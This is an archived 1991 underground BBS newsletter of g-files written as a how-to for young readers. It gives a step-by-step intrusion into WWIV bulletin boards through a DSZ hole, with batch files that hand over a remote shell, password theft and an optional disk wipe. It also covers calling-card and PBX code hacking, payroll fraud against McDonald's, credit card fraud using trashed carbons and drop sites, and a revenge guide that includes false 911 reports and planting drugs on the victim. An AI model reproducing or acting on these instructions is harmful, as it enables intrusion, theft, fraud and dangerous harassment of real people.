home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The B.A.D. Newsletter
/
badnews1.zip
/
NEWS0001.BAD
< prev
next >
Wrap
Text File
|
1991-06-15
|
65KB
|
1,302 lines
Table of Contents.00264
Profile: Truk-king of BaD.01461
Hacking WWIV.06153
Phreaking Advice.13546
Hacking McDonalds.19411
Successful Carding Techniques.26078
Grade-A Harassment.33525
Basic BBS Rules.38137
General BBS News.44121
BaD Group News.61744
###
╓──────────────────────╖
║ BaD Newsletter #1 ║
║ 6/15/91 ║
║A colection of g-files║
╙──────────────────────╜
This is the first of what will one day be a large group of BaD newsletters.
The purpose of these journals is to provide the youth with an understanding
and ability to become better educated in the interworkings of the underground.
Topics discussed will be of a phreak/hack/anarchy nature and are intended to
enlighten and teach the youth of methods and techniques that are used and
being discovered in these fields. We hope that one day, everyone will have the
knowledge they want and deserve.
------------------
Table of Contents:
------------------
I. Profile: Truk-king of BaD
II. "Hacking WWIV" by Vision
III. "Phreaking advice" by Frost Bite of BaD
IV. "Hacking McDonalds" by Plumber of Sorrow of BaD
V. "Successful Carding Techniques" by Crib Death of BaD
VI. "Grade-A Harassment" by Bart Simpson of BaD
VII. "Basic BBS rules" by Cadaver
VIII. "General BBS news" Edited by Bloody Ghoul of BaD
###
**********************************************************************
* File #1, Profile of Truk-king *
* *
* "The best of the best" *
* *
* by Frost Bite *
**********************************************************************
Handle: Truk-king
Call him: Jonathan
Handle origin: Nickname given by a friend at a tractor-pull exhibition.
Date of Birth: 3/27/71
Current age: 20 years old
Height: 5'11
Weight: 175 lbs(pure muscle)
Eye color: Brown
Hair color: Black
Education: Junior at University of Texas
Computers: 486/33, 386/25, PC, broken C-64
Years modeming: 4
Truk-king received a Commodore 64 for his 14 birthday and was instantly
hooked. He read all of the books he could find and taught himself BASIC well
enough to program games. After finding that BASIC was far to slow for any
serious programming, he learned machine language and what the computer was
really about. At this point, he rewrote his finer games and a few utilities
into assembly so that they were not so slow. When he was 15, he was showing
off his games to a family friend who was fairly impressed. He told
Johnathan that he should start programming on more powerful systems such as
the IBM PC's. Johnathan took immmediate interest and wanted one very badly.
That summer, he got a job and worked 40 hours a week. With the money he earned
and his parents help, he was able to buy a PC. Again he read all of the books
he could find and learned PASCAL at first. After mastery of PASCAL, he again
went to program in machine language to unlock his machine's potential. He
began to program more games and disk utilities and found it to be quite easy.
When he went to find games at the store, he found that they were generally
far to expensive for his budget. When a friend of his started working at a
computer store, Johnathan was able to copy games and therby get them for free.
Soon he found that some games were copy protected, so Johnathan began to
investigate how this problem could be resolved.
Johnathan soon found out how games could be copy protected and de-protected
from a friend in a computer group he was in. As Johnathan knew assembly very
well, he figured out how to crack simple protection schemes with the help of
a debugger he could now "afford." This began a series of free games for him
and other computer friends. When he was approached about his "modem handle",
Johnathan knew nothing to say. He knew what a modem was, but had no idea that
they were so incredibly popular among teenage computer users. He immediatly
bought a new 1200 baud modem and started learning the ropes. In the begining,
he called mostly public domain boards to talk about programming and assembly
language coding, but later found that he was better than most of the adults,
and wanted a fresh teenagers mind to communicate with. He worked his way up
in the pirate community quickly and even cracked a few games independently.
As he met more people, he was introduced to phreaking and a little hacking
but stayed mostly with cracking games and writing programs. Two years ago
while working on a project, he realized that no group for the IBM had a goal of
educating the up and coming pirate modem users. "Most groups are out for ego
trips or just to show off", he says and he feels that this needs to be changed.
He and a few friends started a group called BaD, which stands for Bad Ass
Dudes. The group's idea is to be well rounded and not only provide information
in one area, but rather in phreak, hack, pirate, and anarchy areas. This wide
range of knowledge will provide a means of education for someone starting out
as well as giving the experienced person more information to digest. The first
year of BaD's existance was marked with problems and dischord within the group.
After the summer of '90, the had successfully faught off battles with three
smaller groups that have since dissolved(CRiME, GaNG, KiLL.) In the last three
or four months, much has occured that will later shape the group future. A few
inactive members were dropped, but many more were added. BaD plans to go
public again in the next month with cracks and phreak utilities. When you
see this group's fine work, remember, Johnathan is the man behind it.
###
*************************************************************************
* File #2, Hacking into WWIV - Second Edition *
* *
* "Wayne Bell is super lame" *
* *
* by Vision *
*************************************************************************
WWIV, when unmodified and when not using external chains/protocols/programs,
is essentially impregnable. However, good ol' Wayne Bell has also distributed
the source code, external network programs, protocol support, and other nifty
benefits that have made life for a WWIV hack much easier. This textfile will
describe the essentials of hacking into WWIV via a hole in unregistered DSZ.
The key here is >unregistered<, since this hack works through DSZ's refusal
to reroute Zmodem-batch downloads without registration.
Step One:
Call your local WWIV startup under a false alias. They are usually
struggling and haven't had the time to 'register' DSZ with PUTSNP or register
their source so they can patch this hole. You need to find out what COM port
they are operating on. Once you do this, create several files:
a) DLZ.BAT - this should read:
CLS
CTTY CON
DSZ port1 speed2400 sz %1
CTTY COM1
CLS
Substituting, of course, the correct COM port. This will allow
you to download files remotely via Zmodem.
b) HACK.BAT - this should read:
CTTY COM1
COMMAND
Again, if the SysOp is running from another COMport, substitute the
correct number. This will turn over control of the computer to
whatever device is on COM1 (the modem) and run the command
interpreter.
c) NETWORK.COM - the QuickBASIC source for this is:
SHELL "DEL NETWORK.COM"
SHELL "HACK.BAT"
Compile & link it to NETWORK.EXE then rename it to NETWORK.COM.
This will delete itself and run HACK.BAT. If you want, write it in
Pascal or C, but it's not going to make any difference.
Step Two:
Call back and go straight to the transfer section. Upload (to any directory,
or directly to the SysOp). When prompted for the file name, enter
"????????.???" (eight ?'s then three ?'s, without the quotes). You'll see
the Zmodem receive string. Upload one of the above files. The BBS will
say, "transfer aborted"... but you know better! Repeat until all files
have been uploaded.
Step Three:
Call back very shortly afterwards (thirty seconds, no more, no less). When
you get the "NN:" prompt, enter "!-@NETWORK@-!" (again, no quotes). This
will access the unpassworded WWIVnet account (the password routines are
external). When the BBS sees this, it will drop to DOS and run
NETWORK.EXE.
However, since COMs are run before EXEs, your NETWORK.COM will be executed
promptly turning control over to you via HACK.BAT! Now that you are in
DOS, there are a few things that you must immediately do.
Step Four:
Use DLZ.BAT to leech the target's CONFIG.DAT from his main BBS directory (the
one you were dumped in when you arrived). The format is:
DLZ <filename>
where <filename> is the name of the file. For example,
DLZ CONFIG.DAT
will leech the configuration file.
Step Five:
Go to his BBS DATA directory. This is usually C:\WWIV\DATA, but you might
have to look around a little bit. When you find it, use DLZ to leech the
target's USER.LST. Using Norton Utilities or any hex and/or text editor, it
is very easy to see where the usernames and their passwords are stored.
Step Six:
If the target is in WWIVnet or WWIVlink, download his/her CALLOUT.NET file
from the aforementioned data directory. This will be explained later.
Step Seven:
Delete HACK.BAT if you haven't already!
Step Eight:
Look around. Leech anything that looks interesting. This includes:
--> Private G-Files from the G-File section
Good for __/ Lists of credit-card or calling-card numbers
blackmail \ Pirate files
--> His dialing directories from Telemate or Telix; these usually
contain passwords and numbers of private BBS's!
Step Nine:
Hang up. If you really hate him, upload Norton's WIPEDISK.EXE along with the
rest of the files, run it, and permanently destroy all data on his drive.
This is generally not recommended, because so far he has NO WAY of knowing
you were in unless he watched.
---------
Tips:
---------
a) In the target's logs, nothing will show except that you hit 'U'
when you were online and quit before the upload started. This is
virtually always overlooked, and logs more than two days old are
usually deleted.
b) In the target's net logs, he'll probably see a >NO NET<, which is
rather common.
c) Very close to the beginning of CONFIG.DAT and right before the
first directory entry (usually "MSGS\") you will find the target's
SYSTEM PASSWORD. This is needed if you are going to log on as
him or a remote sysop.
d) If a sysop logs on, it is not noted in the LAST FEW CALLERS screen
OR the logs.
e) A few commands that you will want to try out when you are online
as #1 are:
//DOS
//UEDIT
//BOARDEDIT
//DIREDIT
//GFILEEDIT
//CHUSER
Most require the system password, but if you're online as the
sysop you already have that.
f) You can have great fun with planted and rouge mailing if you have
a copy of WWIV and the victim's CALLOUT.NET. CALLOUT.NET has a
little note after every entry that looks something like:
"KAOIYQIGNADFUKG"
Or another random password. Read WWIVTECH.DOC (available on
most WWIV boards) for more information. You should be able
to pick up/drop off mail supposedly from and to your target
very easily for about a week. When you start getting
>BAD PASSWORD<, get back into your victim's DOS and get the
passwords again!
g) You should be able to figure out what to do with the password
file.
h) NEVER, NEVER, NEVER press backspace when there is nothing to
backspace! This will have catastophic effects and will definintel
crash CTTY!
i) This file is provided to inform WWIV sysops of this threat. If
somebody uses it for "bad" purposes, it is not my fault.
I originally wrote this alone a little while ago, but my friends at
BaD were looking for a few good g-filez, and I felt generous. The
above journal was entirely my work. Latez!
\ /
<=---\----/--i--s--i--o--n---=>
\/
###
*************************************************************************
* File #3, Phreaking advice *
* *
* "What to do and what not to do" *
* *
* by Frost Bite *
*************************************************************************
It was recently brought to my attention that the majority of todays youths
don't have a proper understanding of how to phreak, and mostly, how to phreak
safely. The following journal will explain these fine points in will explore
the various ways to benefit from the phone systems with poor security.
Phreaking is the act of making a free phone call by manipulating a phone
system in a manner that is both simple and enduring to many uses.
I. Phreaking with calling card numbers.
This is by far the most common method, but one of the dullest ways too. What
is used in this method is a dialup. Most modern phone system have a seperate
prefix(usually 950) designated for calling cards. At one of these, you follow
the 950 with the four digit company number. Thereafter, there are various
formats in which the calling card number and destination phone number are both
entered.
There are many programs that serve as code hackers, but of them all, Code
Thief appears to be the best. A line for hacking the 1087 entender would be:
7 digit
\ code /
ex. 9501087,,,04156267032415619
/^^^\ \area code and number(no "1" needed)
6 second pause
Of course many companies assign codes that are grouped by their function.
This is where templates are derived from. For the 1087 extender, 04????? seems
to be the most common.
Hacking the codes is simple enough. Running Code Thief should be no problem.
You must make sure of a few things.
1. The dialing speed is not too fast. In terminal mode, typing ATS11=50
will make certain that the numbers will not be entered faster than the
code verifier can read them.
2. The target numbers must be up to date. Numerous hackers have had problems
with their code percentage because of bad target numbers. I cannot stress
enough how important it is to have reliable numbers. Code Thief version 4.0
should come with a list of numbers, but any upgrade should be used in its
place to make certain that the numbers will give a carrier.
3. Hack business hours(9-5) on business days(Mon-Fri) because these are the
times that legitimate users are calling, and your hack attempts won't look
bad with all the other users on.
4. Use a one minute delay. This will also mask your hack attempts and make
a trace much harder to do.
5. Some 9600 modems have problems with Code Thief or other hacking programs.
Try toggling the tenth switch on HST's or running P-Hack instead.
II. PBX phreaking.
Having a PBX at your disposal is a phreakers dream. This means unlimited
outgoing calls with minimal chance of being caught.
A PBX(Private Branch Exchange) is just another phone system that is used
by businessmen to make office connections from home, without having to contact
an operator. However, they also allow you to call out, which is what you're
going to want to do. The first thing you have to do is find a local business
that is big enough to have a PBX.
When you find a buisness in the yellow pages, look at all the phone numbers
they have and see if they use the same prefix in most of their numbers. If so,
you should scan that prefix, because the chances are that if they have a PBX,
it will be in with the rest of their phone numbers.
Now that you have the phone number to this PBX, you must crack the code
on it. You will first want to try the common defaults suck as 9, 8, 89, 123,
and other combinations based upon how many digits are in the code. You should
now try to hack the codes digit by digit until you get a responce from the
system. When it hangs up on you, you can determine that you have entered an
incorrect digit in the code, and you have done the "thinking part" of the
hack process. Make sure to test the number 9 first, as some systems require
it to be pressed before any operation can take place. Once you figure out the
format, you should set up a chart like the following:
(Based on a four digit code)
Digit # │ 1 │ 2 │ 3 │ 4 │
Code ┌────────┼───┼───┼───┼───┘
─────┤ │ │ │ │
1 │ │ │ │ x │
─────┤ │ │ │ │
2 │ │ │ │ │
─────┤ │ │ │ │
3 │ │ │ │ │
─────┤ │ │ │ │
4 │ │ │ │ │
─────┤ │ │ │ │
5 │ │ x │ │ │
─────┤ │ │ │ │
6 │ │ │ x │ │
─────┤ │ │ │ │
7 │ │ │ │ │
─────┤ │ │ │ │
8 │ │ │ │ │
─────┤ │ │ │ │
9 │ │ │ │ │ x
─────┤ │ │ │ │
10 │ │ │ │ │
─────┘
This means the code found was 5619. When you find a corrrect digit, you
record it in the proper box. This is the simplest and most efficient way to
hack. Also there are a few PBX hackers out there, but generally the rule is
that you should hack by hand if you are not 100% sure of the format the PBX
requires. Record any strange responces just as you would when scanning an
exchange.
CONCLUSION: This is only a beginning of the various ways to phreak. More will
come in later issues after you have hopefully mastered these simple, crude
but effective techniques. If you have any questions, leave mail at any BaD
site.
###
*************************************************************************
* File # 4, Hacking McDonalds *
* *
* "Paychecks for you, my friend" *
* *
* by The Plumber of Sorrow *
*************************************************************************
I believe there was already a file written on hacking the fine McDonalds
organization, but it was more about screwing them over than for personal gain.
Ethically, I think it is stupid to screw a company over when there is nothing
in it for you. This goes for anything that is hacked or obtained illegally.
Unprevoked vandalism or destruction is never beneficial to anyone, and only
serves to screw things up for future hackers who may be able to do more than
you currently can.
The Scam: The McDonalds dialins have a certain format they follow for the
managers to access the main computer system. You will call into the main
system with the manager ID and add a 'new' employee. This employee will
work for two weeks(80 hours) at say $7.00/hr and then you will pick up
the check from this McDonalds and never be seen again. You will have just
made a quick $560 and have done no work to show for it.
Calling the main system:
All passwords are a combination of the store number and the managers
position. When it asks for the password, you will enter the McDonalds store
number that you wish to 'work' at and the manager code such as MS, meaning
Manager of the store. The login is in the following format:
,x123456 MS123401
The first part requires a comma and an x followed by a workers six digit
code. When this is valid, you will type MS for store manager, followed by
the store's four digit identification code. This code can be found by calling
the store and simply asking for the store number. You may wish to say that you
are calling from their supply orderind company, Martin-Brower, and that you
wish to confirm and order. Just pretend you have the wrong store when you get
the number.
The last two numbers are the manager number. You should always choose 01
because it means manager one or the head manager. This will provide you with
the greatest level of access.
From this point on, everything is pretty much menu driven and should be
easy enough to figure out. You will have to create an employee and set wages
for him. Do not go above ten dollars an hour, or that might arouse too much
suspicion. Then set the hours worked for 80 and the employee will be awaiting
pay day.
What to do first:
1. Find out pay schedules. This can be done by talking with the employees at
the counter and expressing interest in getting a job there. Ask how much they
get paid and how often and you will have good info. Make sure you find out
which week they get paid on and if its weekly or bi-weekly. If you have inside
information, you will know when payroll gets sent in. Otherwise, it will be
either one or two weeks before paychecks are given out.
2. If you don't have one already, get a fake ID. This will allow you to cash
the check at a check cashing establishment. You will not want to cash this at
a bank because banks are too well secured and have good records of every
transaction. Take it too a place that specializes in cashing checks and try to
look poor. Sometimes stores have a deal with the local bank that they use to
cash checks for their employess even if they don't have an account there. If
ou can put on a decent looking disguise, this might work, but otherwise stay
away from banks.
3. If possible, do this for an out of town McDonalds and have a friend who
works there get it for you. This will minimize risk although it may make
cashing the check difficult if it lists the stores location or address on the
check. Again, any inside connection can verify the format used.
4. Know and plan out everything you are going to say and do. You must act
like nothing strange is happening and you are not nervious. Dress semi-scrubby
but just enough so that you don't stand out and are not remebered. You must act
very casual.
If you have balls of steel: Dress up like a repairman, complete with hat,
uniform and toolbox and ask to be shown the computer system. Tell them you
were sent because their data transmissions were not being properly sent.
If they look doubting, explain protocols, DSZ, line noise, and execessive
error termination to them. When you go back there, feel free to use the
printer to get all the data you need. Then call the manager back over and get
him to tell you his password and code number. Thank him and play with the
system for a while. Then have him sign a phony form saying that you were
there and the time you were there. Be polite and everything will be cool.
Other options from the main menu: When you have logged on, there are other
several options. I would not recommend screwing the company, but if you are
only looking around, the following are available:
A. Cash/Inventory
B. Labor Scheduling
C. Store Profile/Security
D. Corporate Communications
E. ISP Malfunction/Backup/Recovery
F. Manager's Communication Log
G. ISP Training
H. Logoff
At this point, you must enter your password to proceed. All of the above
options can be selected if the password if correct.
Dial-ups: These differ from area to area, but I live in Washington D.C. and
for all of the locals who want to try this, the numbers are:
202-429-7896
202-429-7800
202-435-1800
To get your local dial-up, you maybe be able to scam the manager, but the
best way would probably to go to store itself as a repairman, trashing, or
to get inside info from a friend. Trashing would be at the office, not the food
location of course. You don't want that special sauce all over you for nothing.
I do not know what kind of security is being used, but I have always called
through a diverter of some kind. Do not call directly or you will most likely
get caught and busted. Businesses take things like this very seriously and
do not like unauthorized users on their systems or hacking their systems. If
you are serious about doing this, you should know the proper precautions to
take by now. I have done this twice and have supplemented my income at the
expense of a huge corporation that it does not effect. This is capitalism at
its best.
###
**************************************************************************
* File #5, Successful Carding Techniques *
* *
* "Never pay full price again" *
* *
* by Crib Death *
**************************************************************************
Although carding is the most dangerous activity in the underground elite,
it is also the most rewarding. Once mastered, carding carries over to all other
aspects of life. You WILL get that stereo you want, you WILL get that new
guitar, you will GET anything you want, all for free. With just a little effort
and patience you can soon have it all and you will be a better person for it.
BACKGROUND INFORMATION:
Carding is the use of another persons credit card number to purchase items
for yourself. By giving the number over the phone, you never have to show the
card that you don't have. You only have a copy of the carbon the card made.
Also, you never screw the other person over, because insurance pays for what
you order. Their credit rating never gets messed up either, so no one gets
hurt.
GETTING THE CARD:
The most common way to get a card is to go "trashing." This means going to
a dumpster outside a store or shopping center and finding carbons. Generally
what you want to do is steal the trash and take it home to look at. If you have
a friend with a pickup truck or something, this will be easy. Make sure to avoid
food stores because they don't use cards and have messy trash. The best stores
are department stores, viseo stores and any kind of store that uses a large
amount of credit instead of cash.
Other ways to get a card is to work at or have a friend that works at a
store that has cards. It is not very hard to steal a carbon a day and stick it
it in your pocket. Even a stupid department store job would be well worth it
in the long run if you could have access to card #'s that you could trade or
use. But you must remeber to sit on the card #'s for anywhere from a month to a
year, so they don't get traced back to the store and security gets tight. Also,
assume that after a year, the credit agency will have figured out where the
card #'s are coming from. Change your job/source and keep carding.
WHAT TO CARD AND WHAT NOT TO CARD:
Electronics(not computer stuff), clothing, jewelry, comic books, anything
of value to you that is not directly related to computers. The only places you
can card computer stuff from are stores like Sears, J.C. Pennies, Montgomery
Ward and other lame stores with limited computer stuff. The reason for this
is that they will not be looking for credit card fraud on computer items, and
although you will get lame equipment, you WILL get it. Trying to get stuff from
a place specializing in computer hardware is too difficult and risky to be worth
it. They WILL check credit thoroughly and prosecute hard if you are caught. A
large lame store such as the ones mentioned above take no such precautions as
few people try to card their stuff.
PROCEDURE:
Call up whatever store you will be 'ordering' from. Follow normal procedure
and try to sound like an adult. If your voice isn't mature enough yet, have an
older freind do it. This must not be questionable. Speak slowly and have all
the info you will need at hand. You give the item and card item, now when they
ask for the name give them the card holders if you have it, or give the one that
matches the address you will give if you have it. For the address, you will use
what is called a drop sight. This is a house that people have just moved into
or out of, one where the owners just left for vacation, or one that is vacant
during the day if you are carding over the summer. You will be asking for
overnight shipping to minimize risk and to allow less time for a credit check.
The next day you can do one of two things. You can leave a note on the door of
the house telling them you left but they can leave the package at a hidden
spot by the house(behind bushes, etc.) or you can stake out the house. If you
choose to do the latter of these two you have a few options. Basically what
you will be trying to do is make it look like you live in the house but are
playing outside or whatever. You and a friend should get involved in some
activity that makes it look like you are obviously using this person's
property. This works best if you have a lookout point where you can see any
vehicle that would come by from a distance. When the guy finally comes, act
cool and sign for the package. Then start a casual conversation with your
friend about it to stall for time as you walk toward the house. One of you say
"Wow!! k-cool!! Its about time. I can't wait to use it...blah..blah." By this
time, the lame driver should have left and you now have your card job complete.
POSSIBLE IMPLICATIONS OF CARDING:
The idea of carding is to buy expensive non-computer items and to sell
these and buy what you really want with the cash you get. You will want to hit
the larger department stores that will do the least checking and will basically
send things without doing elaborate checking such as calling the cardholder
and verifying the sale.
WARNINGS:
Chances are that after a few successful card runs, the cops will call on
the FBI. You will have to get everything you want in either 3-4 cardings or
one month, whichever is shortest. Too many card to an area will get too
suspicious and you will get caught. If you feel that you really must card, you
will have to go to another area to do this. Go at least 20 minutes from your
area so that you are in a different city. Stay away from patterns such as
ordering the same kind of stuff. Also, NEVER order twice from the same place.
Not only will they be more reluctant to ship to the same area, if you get
caught the second time, they will be pissed about the first and you will be
prosecuted for both.
If you are caught, admit NOTHING. If you pretend to be ignorant and
stupid, they can get nothing from you. Remember how dangerous this is and
remember to ALWAYS USE OVERNIGHT SHIPPING.
NOTE ABOUT THE AUTHOR:
Crib Death has been carding for five years now and has the following to
show from his dedication to this art form:
(1) $1250 Headstart 286 w/vga and CD-ROM
(1) $500 Ghettoblaster/Boombox
(3) $250 Nugget Rings from Macy's
(2) $275 Gucci watches from Hecht's
(1) $350 Sony diskman deluxe
(1) $200 3-line AT&T speaker-phone
(1) $700 Gibson guitar
(4) $120 Pairs of Reebok Pumps
(1) $300 Alpine Stereo Cassete/AM/FM Radio
(3) $110 Nike Warm-up Suits
and many other smaller things
─────
$5410 in big items.
"I believe with a little hard work and dedication, you can have anything
you want, need, and desire. The american credit system is the greatest in the
world. I will never be without the things I deserve."
[[[ [[[ * [ [[[ [[[ [ [[[ [ [
[ [_[ [ [[[ [ [ [= [=[ [ [[[
[[[ [ [ [ [[[ [[[ [[[ [ [ [ [ [
###
************************************************************************
* File #6, Grade-A harassment *
* *
* "Give 'em just what they deserve" *
* *
* by Bart Simpson *
************************************************************************
Have you ever wanted to get revenge on somebody for any reason? Is so, this
phile is just for you. I will discuss the many ways to do just this in varying
degrees, so that you can choose just how harsh the punishment should be for
whatever they did to screw you over. What you must do is think hard about
what they have done to you and how bad you want revenge.
What you will be doing is giving somebody a day of hell. Everyone knows
about the old "send a pizza to your enemies house and make them pay" trick,
but you will be doing it on a much larger scale. You will call a variety
of services that will either be deliveries or appointments and he will be
greatly annoyed by their actions.
PLACES YOU WILL CALL:
---------------------
1. Pizza places that deliver.
2. Lots of expensive restaurants that take reservations. Make all of these at
the same time if possible.
3. COD's for everything you can find. When you see those stupid advertisements
on TV for dumb products, write down the number and get a COD order sent to your
enemy.
4. Call taxi's and limo services and get multiple appoinments scheduled half an
hour away. This will give him maximum annoyance and still keep the randomness on
on a schedule.
5. Call emergency services like plumbers, electricians and locksmoths, and
explain the "emergency" to them. Ask them to come as fast as possible.
6. See if you can get a construction company to do many great things for you.
First, you will see if they can get you a ton or two of gravel right in your
driveway. Then see if they will inspect your property or do any other work
that should be billable.
7. Call real estate offices and schedule people to come over to discuss your
recent plan to sell the house. Also see if they can appraise it, as this is
often billable. In the mean time, put for sale or rent signs on the lawn as
frequently as possible.
8. Put ads in the newpaper for the yardsale on this day. Posting signs around
the neighborhood that morning will also get the early yard sale loving bunch.
9. Call the police to turn in your enemy for creating a public disturbance with
his stereo, a loud and violent fight with his spouse or some other crime.
10. Call multiple termite and rodent inspectors for appointments on this day.
11. Call professionals like doctors, lawyers, and dentists and make
appointments for your enemy at many different places. When he forgets to show
up, he may get a bill anyway.
12. Call DJ and catering services and schedule parties, etc.
13. Set up a script program that uses SSCU to call his house every five
minutes or so. If you know what this is, you know how funny it would be.
14. Call 911 and report a fire in his attic or some other nonconfirmable area.
15. Call 911 and report multiple gunshots from his house or suspected drug
dealing. If you want to be really mean, hide some of your stash in his car or
something.
PURPOSE:
All of these places will try to reach him him the same day and will be quite
upset when he refuses delivery or to pay for their services. After 50 to 100
different people from all different places arrive at his house, he will be
greatly annoyed and will know he has been defeated. Perhaps some real work will
be done for him, but either way, a business survives on monetary gains. When he
is forced to pay for time wasted or services performed, he will either refuse
or get into a large argument. The hassle of this is so great that he will be
sure to tire quickly.
OTHER PRANKS:
Other pranks include sending away magazine subscriptions to him, especially
if it is hardcore porno or homosexual mags, and he's married, or simple
mindless destruction of his property. I will have an article on destruction in
a later issue.
CONCLUSION:
I hope you enjoyed this article and look foward to many more fine ones like
it. Just call from a pay phone and don't get caught, too many bastards have
caller id these dayz.
l8r,
Bart Simpson
[BaD '91]
###
*************************************************************************
* File #7, Basic BBS rules *
* *
* "How to NOT be an idiot" *
* *
* by Cadaver *
*************************************************************************
Hey all you k-rad dudes and dudettes!!! I'm gonna teach you beginners a few
of the basic BBS rules. And you experienced guys should listen too so that you
can brush up on any rules you may be breaking. These rules are the basic
guideline for boards, although some boards have strict rules and some have no
rules. Unless otherwise stated on the board, you can follow these rules and
you'll be pretty safe.
PURPOSE:
In the last few weeks, I have noticed alot of idiots on some pretty elite
boards. Generally these people are either new couriers or they are friends of
the sysop. These people have no BBS etiquette, and in many cases, their
presence stops the conversational flow on the board. Besides making things
worse for other users, often their stupidity hurts any chance of them moving up
in the BBS society. When their foolhardy posts anger the better users, everyone
turns against them and they are forever sunk. I have seen cases where a
relatively new user asked a few semi-innocent questions, but was torn apart for4
asking them and was banned from one board. As he moved to another board, he
once again made a few dumb comments and was blacklisted there. A gradual
blacklisting occured, and he was forced to quit BBSing. The following rules
are meant to ensure that the same will not happen to you.
RULES OF BBSing:
These are guidelines on how to avoid being a turd. Why? A lot of the fresh
meat on the boards call up and act like total dinks, gronks, and weepos. But
you people who've been around for a while better pay attention because by
paying attention, you can find out why everyone hates your guts.
You might also say that these could help you out in life.
DON'T BE A FUCKING POSER. Don't lie about what boards you're on. Don't
lie about what people you talk to. Don't say you can do things you KNOW that
you cannot and will never be able to do in a million years. Because if you did
it to me personally, I'd ask the people who run the boards and who you say you
talk to. And if you lied to me, I'd grind you into dog meat. This is the
single most important rule. Posers get thrashed.
DON'T BE A TOADY BUTT-LICK. Ok, maybe you should butt lick some people
because after all, that's how just about every loser no-talent gets into a
group. But you sure as hell don't have my respect for it.
DON'T RAG ON PEOPLE JUST BECAUSE SOMEONE ELSE IS RAGGING ON THEM. This is
more repulsive than being just a toady butt-lick. It's being swayed by the
crowd. It's showing that you are willing to shovel shit onto a human being
who could be a perfectly decent person because you're deperate to keep other
losers from ganging up and ragging on you.
LEECHING IS OK, JUST DON'T BE A PRICK ABOUT IT. If someone lets you leech,
keep it reasonable (ask what is reasonable if you don't know). And if you ever
have the chance to get something that you know that the other person wants or
might want, give it to that person. In other words, be nice to the people who
are nice to you, and don't abuse their kindness.
HAVE SOME DIGNITY. Don't be a Miss Manners clone, but if someone asks a
stupid question or says something ignorant, you don't have to pound him into
the ground unless he's a real asshole. If YOU say something ignorant or get
shown up, at least have the dignity to admit you were wrong without whining
or making cheap excuses.
Ok, the way that you present yourself on a BBS is through your posts. Some
quick tips on this:
Don't reply to every single message. Especially don't post one line messages
like:
"You're right!"
"Sounds cool to me!"
"Hehehehehehehhe"
If you don't have anything intelligent to say, keep your mouth shut.
If you have something to say, try to make sure that someone else hasn't already
said it and make sure you're saying it in the right place.
Once again, share your knowledge on anything people ask. If you do have
something truely brilliant to say, you will be noticed through good posts and
especially informative ones. Even if this is only to say, "Don't see this lame
movie" or "Don't download that, its an old crack" you will be noticed over time
if you are helpful. Sysops enjoy these type of people on their boards because
they save them time and the hassle of having to check things out themselves.
Also, don't be scared of sysops. Sysops are people too, and many times only are
sysops because they have the cash flow to run a 486/33 800 meg system. Often
sysops are just cool people with money and enjoy a good user. Act just like you
would around your friends and if you happen to get along with the dude, maybe
he'll give you leech access or sleep with his sister. Either way, its cool to
know sysops because you never know when you'll need some obscure file that only
he's got.
On net posts, make sure that the post will be recognized by all, and not just
a few locals who know about an inside joke or a local lamer. Make sure anyone
can understand it. If you post alot on net boards and your posts are good, you
will be recognized and get invitations to elite LD boards or at least the
respect of many.
Hopefully with these hints, you can become a true individual and add needed
interest to the world's bbs'. I personaly guarantee that if you follow this
basic set of rules, you at least have a chance to become elite.
###
*************************************************************************
* File #8, General BBS news *
* *
* "More of what you want and need to know" *
* *
* Edited by Bloody Ghoul *
*************************************************************************
Lots has been going on in the last few weeks and I'm gonna try to keep you
up to date with it all. This is my first job as an editor and my goal is to
keep all of the news interesting and accurate as well as up to date. Hopefully
this should be the last word in arguements as I try to show both sides of a
dispute and have you make your own decision. Well, enough chitter-chatter from
me, here's the news.
-----------------------------------------------------------------------------
CRZY JOE OF NEUA BUSTED!!!
Crzy Joe, the vice-president of NEUA has been busted for phreaking.
Recently, AT&T confronted him and told him that he owes them over $5000 for
various calls he has billed to calling cards. He is attempting to fight the
charges in court, in hopes that his use of the codes cannot be proven. In the
mean time, he may have been kicked out of the private school he went to and is
getting "alot of grief" from his parents. He continues to call a few of his
favorite boards and also says that final exams are taking up a large part of
his time. He thinks he can have this problem straightened out by late June on
July. We at BaD hope he can come back as soon as possible to further positively
influence the pirate community. With the Daffy Duck education series
release, NEUA has shown their desire to teach and develop the young minds of
the pirate world. We wish you the best of luck with your trial and await your
return.
----------------------------------------------------------------------------
THG MAY SOON TO BREAK UP!!!
THG's fun as a cracking group may soon to be over. With many members angry
over bad attitudes, and factional differences in the group, members may soon
split up and go their seperate ways. THG crackers will be the first to go, and
a few have privately stated their desires to join new up and coming groups. When
the majority of the crackers have left, the group will have nothing to support
its big talk. Their courier system has been hurt by their idea to "deregulate"
it, eliminating humble slaves and spittle. Enjoy THG cracks while you can,
because in a few weeks, nothing will remain of this once great group. Look for
active and interested members to filter into one of the newer cracking groups,
INC, or maybe another minor group. This information comes from speaking with
crackers and sysops of THG and is confirmed. Let the legacy of THG never be
forgotten though. They provided the underground with great games for a long
time, and their interesting personalities were the ones we loved to hate.
Perhaps now, they will all be a little more humble.
-----------------------------------------------------------------------------
BLUE ADEPT BUSTED!!!
What was thought to be the easiest code hack of the 90's turned out to
be quite unlucky for Blue Adept. He was the latest victims of U.S. telecom's
1-800-369-3100 busts. After a few months of use, his line was searched for
excessive 800 accesses, and U.S. Telecom was contacted. He was sent a bill for
$134, $98 of which was for calls, and $30 for abuse of 3 codes. He refuses to
pay the bill and doesn't think the phone company will bother him about $134, but
is thinking about getting another line under a different name in case his line
is being monitored.
-----------------------------------------------------------------------------
ANSI ALTERNATIVES
Just when ACiD looked to have a monopoly and a happy one at that, they
bagan to ask for a small payment for their work. To some, $20 is no big thing,
but to others, the concept of paying for computer work is ludicrous. These
strong objectors have gone so far as to do their own work, often for free.
A group called GDi was set up run by The Doctor and free ansi's were promised.
The group disbanded after two weeks after they were not given sufficient
opportunity to prove their work. The Doctor continues to do ansi's alone, but
the rest of the group has lost interest.
In direct competition with ACiD, Kingpin has decided that he can do ACiD
quality ansis for half of the price. Every week, he plans to create an ansi
for the bargain price of $10. E-mail him on elite boards for further
information on this deal.
Also making incredible ansi's is NimRod of (615). He has been around for
a long time and has gained quite a reputation. Rumor has it that he is only
making ansi's for friends, but if you be able to bribe him. He has created
some of the gretest ansis ever.
-----------------------------------------------------------------------------
LATEST UPDATES ON GROUPS
INC has reinforced its line up and has a stronger cracking department. The
new and improved lineup looks as follows:
President: Line noise
Vice President: Cool Hand
